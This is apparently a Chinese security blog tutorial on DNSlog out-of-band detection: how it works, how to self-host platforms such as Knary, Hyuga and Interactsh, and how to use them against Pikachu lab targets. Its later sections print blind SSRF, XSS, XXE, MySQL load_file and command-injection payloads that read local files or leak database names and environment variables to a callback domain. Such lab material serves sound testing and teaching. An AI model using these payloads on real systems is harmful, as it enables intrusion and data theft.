DNSlog工具原理搭建及使用

安全工具

发布日期: 2022-01-06

DNSlog工具原理搭建及使用

DNSlog是什么

DNS就是将域名解析为ip，用户在浏览器上输入一个域名A.com，就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1，这样就可以访问127.0.0.1服务器上的相应服务。那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息，它记录着用户对域名www.baidu.com等的访问信息，类似日志文件。

DNSlog回显原理

域名分级与域名解析过程(DNS)

因特网采用层次树状结构命名方法。域是名字空间中一个可被管理的划分（按机构组织划分），域可被划分为子域，子域可再被划分，即形成了顶级域名、二级域名、三级域名等。从右向左为顶级域名、二级域名、三级域名等，用点隔开。如：
tieba.baidu.com

它由三个标号组成， com即为顶级域名，baidu为二级域名，tieba即为三级域名。且域名不分区大小写。

比如说,我注册了一个为luomiweixiong.com的域名,我将它的a记录泛解析到139.x.x.x上,这样就实现了无论我记录值填什么他都有解析,并且都指向139.x.x.x,当我向dns服务器发起test.luomiweixiong.com的解析请求时,DNSlog中会记录下他给test.luomiweixiong.com解析,解析值为139.x.x.x.

免费的平台

http://www.dnslog.cn
http://admin.dnslog.link
http://ceye.io

http://www.dnslog.cn使用方法

（1）Get SubDomain的意思是获取子域名，这里点击完就给我们一个三级域名。复制完后，打开新网页并粘贴在url上，访问

（2）在本机实验演示
ping命令的时候会用到DNS解析

ping命令的时候会用到DNS解析

解析的日志会把%USERNAME%的值给带出来，因为系统在ping命令之前会将%USERNAME%的值解析出来，然后再和a.com拼接起来，最后ping命令执行将XF.a.com一起发给DNS服务器请求解析域名对应的ip地址，这个过程被记录下来就是DNSlog。
原理上只要能进行DNS请求的函数都可能存在DNSlog注入。

dns缓存可能造成记录不刷新，此时更换新的域名即可。

其它平台同理。

DNSlog使用的地方

目标不让信息显示出来，如果能发送请求，那么就可以尝试咱这个办法——用DNSlog来获取回显
（1）SQL注入中的盲注
（2）XSS盲打
（3）无回显的命令执行
（4）无回显的SSRF
（5）无回显的XXE（Blind XXE）

搭建自己的dnslog平台

前提：一台公网ip的VPS和一个域名

域名利用freenom网站或eu.org或pp.ua注册即可

利用Cloudflare进行解析
因为Freenom本地的解析在国内不够好用，咱们就换个。
注册cloudflare账号

配置你的域名

配置NameServer,指向CloudFlare。

xxx.ns.cloudflare.com
xxx.ns.cloudflare.com

配置NS记录

分别申请两个DNS记录，NS记录代表子域名log.where.cf的DNS服务器为ns.where,cf

测试是否生效
网上python2的dns脚本

#/usr/bin/python2
# -*- coding:utf-8 -*-
from twisted.internet import reactor, defer
from twisted.names import client, dns, error, server
record={}
class DynamicResolver(object):
    def _doDynamicResponse(self, query):
        name = "query.name.name" #修改域名 
        # 返回指定应答IP
        ip = "x.x.x.x"
        print(name+" ===> "+ip)
        answer = dns.RRHeader(
            name=name,
            type=dns.A,
            cls=dns.IN,
            ttl=0, # 这里设置DNS TTL为 0
            payload=dns.Record_A(address=b'%s'%ip,ttl=0)
        )
        answers = [answer]
        authority = []
        additional = []
        return answers, authority, additional
    def query(self, query, timeout=None):
        return defer.succeed(self._doDynamicResponse(query))
def main():
    factory = server.DNSServerFactory(
        clients=[DynamicResolver(), client.Resolver(resolv='/etc/resolv.conf')]
    )
    protocol = dns.DNSDatagramProtocol(controller=factory)
    reactor.listenUDP(53, protocol)
    reactor.run()
if __name__ == '__main__':
    raise SystemExit(main())

python2和pip在ubuntu中安装

add-apt-repository universe
apt update 
apt install python2
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py
python2 get-pip.py

注：国内域名可能有需要备案问题

如果是云服务器，到防火墙中开放自己的53端口
临时解决：
53端口被占用，lsof -i:53查看pid，kill -9 pid，ubuntu关闭systemctl stop systemd-resolved

长期生效：
vim /etc/systemd/resolved.conf,如下图配置，关闭监听。

接着重启服务, systemctl restart systemd-resolved

vim /etc/resolv.conf

部署DNS服务
将dnslog的liunx版本从github下载到vps中
https://github.com/yumusb/DNSLog-Platform-Golang
https://github.com/lanyi1998/DNSlog-GO/releases/
https://github.com/chennqqi/godnslog

ubuntu 完全干净的卸载docker

#docker --version
apt-get autoremove docker docker-ce docker-engine  docker.io  containerd runc
#删除docker其他没有没有卸载
dpkg -l | grep docker
dpkg -l |grep ^rc|awk '{print $2}' |sudo xargs dpkg -P
#卸载没有删除的docker相关插件(结合自己电脑的实际情况)
apt-get autoremove docker-ce-*
#删除docker的相关配置&目录
rm -rf /etc/systemd/system/docker.service.d
rm -rf /var/lib/docker
##删除docker的相关配置&目录
docker --version

DNSLog-Platform-Golang

下载
git clone https://github.com/yumusb/DNSLog-Platform-Golang

编辑配置文件

cd DNSLog-Platform-Golang
vi config.tomal

[front]
template = "index.html"
[back]
listenhost = "0.0.0.0"
listenport = 11111
domains = [ "log.xxx.xx"]
cname = ""
[basicauth]
check = false
username = "yumu"
password = "yumusb"

前端模板文件
后端监听的主机、端口、域名、与CNAME响应
HTTP BASIC AUTH的是否打开（check=true）与密码配置

go环境配置
go env -w GO111MODULE=on
go env -w
GOPROXY=https://goproxy.cn,direct #可选，国内机器不能上github则需要执行此处以设置{代}{理}
go run main.go或者nohup go run main.go &

Knary

二进制文件部署:

wget https://ghproxy.com/https://github.com/sudosammy/knary/releases/download/v3.3.1/knary-3.3.1-linux-amd64
chmod +x knary-3.3.1-linux-amd64
mv knary-3.3.1-linux-amd64 knary
./knary

如果二进制不安全，可以考虑Docker 快速搭建:

export GIT_SSL_NO_VERIFY=0
git clone http://ghproxy.com/https://github.com/sudosammy/knary.git
# 编辑docker-compose.yaml的信息
vim docker-compose.yaml

环境变量信息有两种配置方式，一种是利用当目前的.env文件，一种是直接配置环境变量environment,也可以混合来用，我这里先配置下CANARY_DOMAIN=CANARY_DOMAIN=log.xxxx.xxx

version: "3.9"
services:
  knary:
    container_name: knary
    hostname: knary
    restart: always
    env_file:
      - .env # as commented below, you can also use the `environment` key to specify variables. This will overwrite anything in `env_file`
    # environment:
    #   - DNS=true
    #   - HTTP=true
    #   - BIND_ADDR=127.0.0.1
       - CANARY_DOMAIN=log.log4j2.ga
    # (etc. etc.)
    build: .
    ports:
      - "80:80"
      - "443:443"
      - "53:53/udp"
    volumes:
      - ./certs:/certs/

编辑一份环境变量:

vim .env
# 内容
# RENAME ME TO .env
DNS=true
HTTP=true
BIND_ADDR=0.0.0.0
CANARY_DOMAIN=log.log4j.ga
LETS_ENCRYPT[email protected]
EXT_IP=1x1.xxx.1xx.x3
DEBUG=true
LOG_FILE=knary.log

有两种方法，快速配置HTTPS证书:

1)自签名证书

当前目录创建一个cert文件夹

mkdir certs
openssl创建证书

sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout ./certs/selfsigned.key -out ./certs/knary.crt
信息可以随意填

2)Let’s Encrypt 免费https，Kanry自带，只需要配置好邮箱即可，推荐使用这种!

docker-compose启动

# 卸载原先docker
apt-get remove -y remove docker
# 安装最新docker
curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun
# 安装docker-compose
sudo curl -L 
"https://ghproxy.com/https://github.com/docker/compose/releases/download/v2.2.2/docker-compose-$(uname -s)-$(uname -m)" -o /usr/bin/docker-compose
sudo chmod +x /usr/bin/docker-compose

Ubuntu构建过程可能会报错,修改/etc/resolv.conf的值为这个即可

nameserver 8.8.8.8
nameserver 114.114.114.114
nameserver 127.0.0.53
nameserver 223.5.5.5
options edns0

如果出现不生效可以参考：
https://blog.csdn.net/booklijian/article/details/116491288?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&utm_relevant_index=1

为了兼容国内VPS还需要修改Dockerfile添加Golang代理,要不然go get会失败:

RUN export GOPROXY=https://goproxy.io && go get .

Hyuga

git下载

git clone https://github.com/Buzz2d0/Hyuga.git
cd Hyuga

修改config.xml文件

main中填写自己的域名（比如是log.xxx.xx）
修改对应的ns为自己的ns域名(比如ns.xxx.xx)

Docker快速组建:

docker-compose build
docker-compose up -d

成功后如官网demo所示

Interactsh

手工搭建

安装Golang 1.16.1环境:

apt-get update
apt-get -y upgrade
apt install  -y gcc
mkdir tmp
cd /tmp
wget https://dl.google.com/go/go1.16.1.linux-amd64.tar.gz
tar -xvf go1.16.1.linux-amd64.tar.gz 
mv go /usr/local/
echo "export GOROOT=/usr/local/go" >>  ~/.profile
echo "export GOPATH=$HOME/go" >>  ~/.profile
echo "export PATH=$GOPATH/bin:$GOROOT/bin:$PATH" >> ~/.profile
source ~/.profile

安装Interachsh Server

go get -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest

docker搭建

docker run projectdiscovery/interactsh-server:latest -domain log.log4j.ga

SSRF盲打

靶场实例练习

Pikachu 靶场一个 SSRF 漏洞实例：
点击链接发现发现它通过一个 url 参数传递了一个 URL 给后台并读取文件（可能靶场环境问题此处没成功读取到诗歌文件url=http://127.0.0.1/lab/vul/ssrf/ssrf_info/info1.php）：
修改 url 参数为如下，可借助 SSRF 漏洞进行内网端口探测：
url=http://127.0.0.1:3306
修改 url 参数为如下，可借助 SSRF 漏洞读取本地文件：

url=file:///C:/Windows/system32/drivers/etc/hosts

在 DNSlog 平台申请一个子域名,然后访问 ?url=http://8b7b7d7c.log.xxx.cf，如下：

XSS的盲打

在实战中能真正能构成致命性损伤的 XSS 类型就是储存型 XSS，一般是从前台打到后台，一般反射型 XSS 我们常见做法一般是给自己弹个 alert 就可以知道这个语句有没有执行，有没有被屏蔽。但是前台打到后台的储存型盲打 XSS 我们肯定是不可能通过 alert 去验证漏洞是否存在。弹 alert 必然是要惊动管理员，况且就算在后台弹窗了，我们也看不到。

，比如说这有个留言框，我们输入个 Payload 如下：
好的管理员！<script src=http://testxss.a.com></script>

因为 script 标签的 src 是在加载后就自动去请求的，并且 http 协议仍然会用到 dns 协议，当管理员从留言板看到这条消息的时候浏览器就会自动去请求 http://testxss.a.com，这样子的话，就会在 DNSlog 里留下如下记录：
testxss.a.com 10.0.0.0

当我们在 dnslog 里看到了这条记录的时候，就说明盲打 XSS 存在了。

靶场 XSS 盲打实例

以 Pikachu 靶场的一个 XSS 漏洞环境为例：
插入 <script>alert(1)</script>即可触发弹窗：
接下来插入<script src="http://8b7b7d7c.log.xxx.cf"></script>：
可以在 DNSlog 平台看到对应的请求记录：

此处的 Payload 使用<img src="http://8b7b7d7c.log.xxx.cf">也可以

XXE的盲打

对于没有回显的 XXE 漏洞，同样可以使用 DNSlog 平台进行漏洞检测。

XXE 盲打靶场实例

以 Pikachu 靶场的 XXE 漏洞环境为例：

先构建常规测试 Payload：

<?xml version = "1.0"?>
<!DOCTYPE note [
    <!ENTITY hacker "Tr0e">
]>
<name>&hacker;</name>

借助 XXE 漏洞构造读取本地文件的 Payload：

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]> 
<foo>&xxe;</foo>

假设这是一个 XXE 无回显的漏洞，或者说不清楚服务器是什么操作系统、不清楚文件组成，可以构造如下 DNSlog 相关的 Payload：

]>
&xxe;

SQL的盲注

不论是布尔型盲注还是时间型盲注，都需要频繁的跑请求才能够获取数据库中的值，在现代 WAF 的防护下，很可能导致 IP 被 ban。我们可以结合 DNSlog 完美快速的将数据取出。如遇到 MySql 的盲注时，可以利用内置函数 load_file() 来完成 DNSlog，load_file()不仅能够加载本地文件，同时也能对诸如 \www.test.com 这样的URL发起请求。

SQL盲注靶场实例

下面同样以 Pikachu 靶场的 SQL 盲注（布尔型）漏洞环境为例：
输入kobe’ and 1=1#可成功查询：
输入kobe’ and 1=2#查询失败:
输入利用 DNSlog 回显数据库名称的 Payload：
?id=1' and load_file(concat('\\\\',(select database()),'.stzi44.dnslog.cn\\abc'))--+

注：dnslog注入只能用于windows，因为load_file这个函数的主要目的还是读取本地的文件，所以我们在拼接的时候需要在前面加上两个//，这两个斜杠的目的是为了使用load_file可以查询的unc路径。但是Linux服务器没有unc路径，也就无法使用dnslog注入

RCE的盲打

操作系统	盲注方式
windows	%variable%
linux	反引号 variable 反引号

windows Payload：

%OS%.8b7b7d7c.log.xxx.cf

windows常用变量

//变量                 类型       描述
//%ALLUSERSPROFILE%   本地       返回“所有用户”配置文件的位置。
//%APPDATA%           本地       返回默认情况下应用程序存储数据的位置。
//%CD%                                                        本地       返回当前目录字符串。
//%CMDCMDLINE%        本地       返回用来启动当前的 Cmd.exe 的准确命令行。
//%CMDEXTVERSION%     系统       返回当前的“命令处理程序扩展”的版本号。
//%COMPUTERNAME%      系统       返回计算机的名称。
//%COMSPEC%           系统       返回命令行解释器可执行程序的准确路径。
//%DATE%              系统       返回当前日期。使用与 date /t 命令相同的格式。由 Cmd.exe 生成。有关 date 命令的详细信息，请参阅 Date。
//%ERRORLEVEL%        系统       返回上一条命令的错误代码。通常用非零值表示错误。
//%HOMEDRIVE%         系统       返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
//%HOMEPATH%          系统       返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
//%HOMESHARE%         系统       返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
//%LOGONSERVER%       本地       返回验证当前登录会话的域控制器的名称。
//%NUMBER_OF_PROCESSORS%         系统      指定安装在计算机上的处理器的数目。
//%OS%                           系统      返回操作系统名称。Windows 2000 显示其操作系统为 Windows_NT。
//%PATH%                         系统       指定可执行文件的搜索路径。
//%PATHEXT%                      系统       返回操作系统认为可执行的文件扩展名的列表。
//%PROCESSOR_ARCHITECTURE%       系统       返回处理器的芯片体系结构。值：x86 或 IA64（基于 Itanium）。
//%PROCESSOR_IDENTFIER%          系统       返回处理器说明。
//%PROCESSOR_LEVEL%              系统       返回计算机上安装的处理器的型号。
//%PROCESSOR_REVISION%           系统       返回处理器的版本号。
//%PROMPT%                       本地       返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。
//%RANDOM%                       系统       返回 0 到 32767 之间的任意十进制数字。由 Cmd.exe 生成。
//%SYSTEMDRIVE%                  系统       返回包含 Windows server operating system 根目录（即系统根目录）的驱动器。
//%SYSTEMROOT%                   系统       返回 Windows server operating system 根目录的位置。
//%TEMP%和%TMP%                  系统和用户 返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP，而其他应用程序则需要 TMP。
//%TIME%                         系统       返回当前时间。使用与time /t命令相同的格式。由Cmd.exe生成。有关time命令的详细信息，请参阅 Time。
//%USERDOMAIN%                   本地       返回包含用户帐户的域的名称。
//%USERNAME%                     本地       返回当前登录的用户的名称。
//%USERPROFILE%                  本地       返回当前用户的配置文件的位置。
//%WINDIR%                       系统       返回操作系统目录的位置。